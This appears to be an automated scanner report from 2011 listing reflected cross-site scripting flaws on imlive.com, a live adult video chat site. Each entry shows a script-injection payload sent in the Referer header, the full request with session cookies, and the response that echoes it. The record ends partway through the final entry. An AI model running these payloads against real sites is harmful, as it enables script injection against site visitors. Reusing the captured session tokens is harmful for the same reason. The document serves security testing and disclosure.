HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:14:26 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:14:26 GMT Connection: close Content-Length: 8328 Vary: Accept-Encoding
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5eb49'><script>alert(1)</script>a0a4a130032 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /customerservice.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=5eb49'><script>alert(1)</script>a0a4a130032
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:14:16 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:14:15 GMT Connection: close Content-Length: 14451 Vary: Accept-Encoding
<HTML> <HEAD> <title>Customer Service - Live Video Chat at ImLive</title> <meta name="description" content="You are very important to us, and we strive to provide you with world class custom ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/help/guide/guide.asp&lr=1107816009&ud=0&pe=help/guide/guide.asp&rf=http://www.google.com/search?hl=en^q=5eb49'><script>alert(1)</script>a0a4a130032&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3d32e'><script>alert(1)</script>90577f18320 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /disclaimer.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=3d32e'><script>alert(1)</script>90577f18320
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:52 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:51 GMT Connection: close Content-Length: 78924 Vary: Accept-Encoding
<html> <head> <title>Disclaimer - Live Video Chat at ImLive</title>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1365d'-alert(1)-'8c7ad16a976 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forgot.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=1365d'-alert(1)-'8c7ad16a976
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:38 GMT Connection: close Content-Length: 3308 Vary: Accept-Encoding
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f31f'-alert(1)-'d8c094b7adb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forgot.aspx HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=9f31f'-alert(1)-'d8c094b7adb
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:47 GMT Connection: close Content-Length: 3308 Vary: Accept-Encoding
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e3d10'><script>alert(1)</script>76788ffdb68 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /homepagems3.asp HTTP/1.1 Host: imlive.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000 Referer: http://www.google.com/search?hl=en&q=e3d10'><script>alert(1)</script>76788ffdb68
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 39448'><script>alert(1)</script>4985a3648d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /hostmembers.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=39448'><script>alert(1)</script>4985a3648d9
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:14:16 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:14:16 GMT Connection: close Content-Length: 10795 Vary: Accept-Encoding
<HTML> <HEAD>
<TITLE>ImLive - Host Login</TITLE>
<meta name="description" content="Welcome, ImLive Hosts. Please login to live video chat about everything from friendship and romance ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/login.asp?host&lr=1107816009&ud=0&pe=login.asp&rf=http://www.google.com/search?hl=en^q=39448'><script>alert(1)</script>4985a3648d9&qs=host&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9543d'-alert(1)-'3fbf0fbae6a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=9543d'-alert(1)-'3fbf0fbae6a
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:05 GMT Connection: close Content-Length: 39949 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category.aspx&he=imlive.com&ul=/live-sex-chats/&rf=http://www.google.com/search?hl=en^q=9543d'-alert(1)-'3fbf0fbae6a&qs=cat=1&qs=cat=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd2e5'-alert(1)-'83f3da1d0da was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/adult-shows/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=dd2e5'-alert(1)-'83f3da1d0da
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:41 GMT Connection: close Content-Length: 25196 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... "text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/bt/btguest.aspx&he=imlive.com&ul=/live-sex-chats/adult-shows/&rf=http://www.google.com/search?hl=en^q=dd2e5'-alert(1)-'83f3da1d0da&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50e28'-alert(1)-'4ef9bdb79a0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/cam-girls/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=50e28'-alert(1)-'4ef9bdb79a0
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:23 GMT Connection: close Content-Length: 224507 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=50e28'-alert(1)-'4ef9bdb79a0&qs=cat=1^roomid=10&qs=cat=1^roomid=10&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15c00'-alert(1)-'13ed03de9eb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
